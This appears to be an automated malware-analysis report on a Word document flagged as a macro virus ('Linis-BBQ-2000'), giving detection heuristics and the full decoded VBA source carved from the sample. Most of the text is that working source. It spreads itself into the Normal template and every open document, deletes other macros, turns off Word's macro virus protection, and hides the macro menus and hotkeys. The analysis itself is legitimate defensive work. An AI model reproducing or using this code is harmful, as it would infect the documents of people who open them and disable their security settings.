MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The document contains a VBA macro, indicated by the 'OLE_VBA_MACROS' and 'OLE_LEGACY_WORDBASIC_MACRO_VIRUS' heuristics, and specifically an 'AutoOpen' macro, suggesting malicious intent. The macro's purpose appears to be to clean or modify the Normal template, potentially to establish persistence or evade detection, as suggested by the 'Linis_Cls' and 'Linis_Bbq' modules. The document body itself is a lure for a paid seminar, which is a common tactic for phishing or financial scams.
Heuristics 5
-
ClamAV: Doc.Trojan.Opey-18 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Opey-18
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Application.OrganizerCopy Source:=NormalTemplate.FullName, _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6188 bytes |
SHA-256: 94c21f6a8046e48274f222a2b7d1ec4d70eac4c7bec4be6e594946e639730f77 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Linis_Cls"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_Creatable = True
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Property Let clsProctection(pValue As Boolean)
Options.VirusProtection = pValue
End Property
Property Let clsSaveNormal(pValue As Boolean)
Options.SaveNormalPrompt = pValue
End Property
Attribute VB_Name = "Linis_Bbq"
' ------------------------------------------------------------------------------------
' USER: Linis-BBQ-2000
' AUTHOR: FRANCIS LIM
' DATE CREATED: Oct 20, 2000
' ------------------------------------------------------------------------------------
Private Sub Hawaan()
On Error Resume Next
Dim DocuName$, OpenDocImmunized As Boolean
Dim I%, J%, NmImmunized$
NmImmunized = "0"
For I = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
DocuName = NormalTemplate.VBProject.VBComponents(I).Name
If DocuName = GetSource() Then NmImmunized = "1"
If (DocuName <> GetSource()) And _
(DocuName <> "Linis_Cls") And _
(DocuName <> "ThisDocument") Then
Application.OrganizerDelete _
Source:=NormalTemplate.FullName _
, Name:=DocuName _
, Object:=wdOrganizerObjectProjectItems
End If
Next I
For Each opendoc In Documents
OpenDocImmunized = False
With opendoc
For J = opendoc.VBProject.VBComponents.Count To 1 Step -1
DocuName = opendoc.VBProject.VBComponents(J).Name
If DocuName = GetSource() Then OpenDocImmunized = True
If (DocuName <> GetSource()) And _
(DocuName <> "Linis_Cls") And _
(DocuName <> "ThisDocument") And _
(DocuName <> "Reference to Normal") Then
Application.OrganizerDelete Source:=opendoc.FullName _
, Name:=DocuName _
, Object:=wdOrganizerObjectProjectItems
End If
Next J
If Not OpenDocImmunized Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=opendoc.FullName, _
Name:="Linis_Cls", _
Object:=wdOrganizerObjectProjectItems
opendoc.SaveAs FileName:=opendoc.FullName
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=opendoc.FullName, _
Name:=GetSource(), _
Object:=wdOrganizerObjectProjectItems
opendoc.SaveAs FileName:=opendoc.FullName
End If
End With
Next opendoc
If NmImmunized = "0" Then
ActiveDocument.VBProject.VBComponents.Item(GetSource).Export Application.Path & "\102002HS.TMP"
NormalTemplate.VBProject.VBComponents.Import Application.Path & "\102002HS.TMP"
ActiveDocument.VBProject.VBComponents.Item("Linis_Cls").Export Application.Path & "\102002HS.TMP"
NormalTemplate.VBProject.VBComponents.Import Application.Path & "\102002HS.TMP"
Kill Application.Path & "\102002HS.TMP"
End If
End Sub
Sub Protectahan()
Dim clsOption As Linis_Cls
On Error Resume Next
Set clsOption = New Linis_Cls
Application.DisplayAlerts = wdAlertsAll
WordBasic.DisableAutoMacros -1
With Application
.UserName = "FRANCIS LIM"
.UserAddress = "Linis-BBQHS-2000"
.UserInitials = "BBQ-KY"
End With
With Dialogs(wdDialogFileSummaryInfo)
.Author = "FRANCIS LIM"
.Keywords = "Linis-BBQHS-2000"
.Execute
End With
With Options
.ConfirmConversions = True
End With
clsOption.clsProctection = False
clsOption.clsSaveNormal = False
With ActiveDocument
.ReadOnlyRecommended = False
End With
With CommandBars("Visual Basic")
.Enabled = True
.Protection = msoBarTypeMenuBar
.Protection = msoBarMenuBar
End With
With CommandBars("Tools")
.Reset
.Controls("Macro").Reset
.Controls("Customize...").Reset
End With
FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Clear
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Clear
CustomizationContext = NormalTemplate
Set clsOption = Nothing
End Sub
Sub FileSave()
On Error Resume Next
Call Protectahan
Call Hawaan
ActiveDocument.Save
End Sub
Sub FileClose()
On Error Resume Next
Call Protectahan
Call Hawaan
If ActiveDocument.Saved = False Then ActiveDocument.Save
ActiveDocument.Close
End Sub
Sub FileExit()
On Error Resume Next
Call Protectahan
Call Hawaan
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.Quit
End Sub
Sub FileNew()
On Error Resume Next
Call Protectahan
Call Hawaan
Dialogs(wdDialogFileNew).Show
Call Hawaan
End Sub
Sub AutoOpen()
On Error Resume Next
Call Protectahan
Call Hawaan
End Sub
Sub AutoExec()
On Error Resume Next
Call Protectahan
Call Hawaan
End Sub
Sub FileSaveAs()
On Error Resume Next
Call Protectahan
Call Hawaan
Dialogs(wdDialogFileSaveAs).Show
Call Hawaan
End Sub
Sub FileOpen()
On Error Resume Next
Call Protectahan
Call Hawaan
Dialogs(wdDialogFileOpen).Show
Call Hawaan
End Sub
Function GetSource() As String
On Error Resume Next
GetSource = Chr(76) & Chr(105) & Chr(110) & Chr(105) & Chr(115) & Chr(95) & Chr(66) & Chr(98) & Chr(113)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.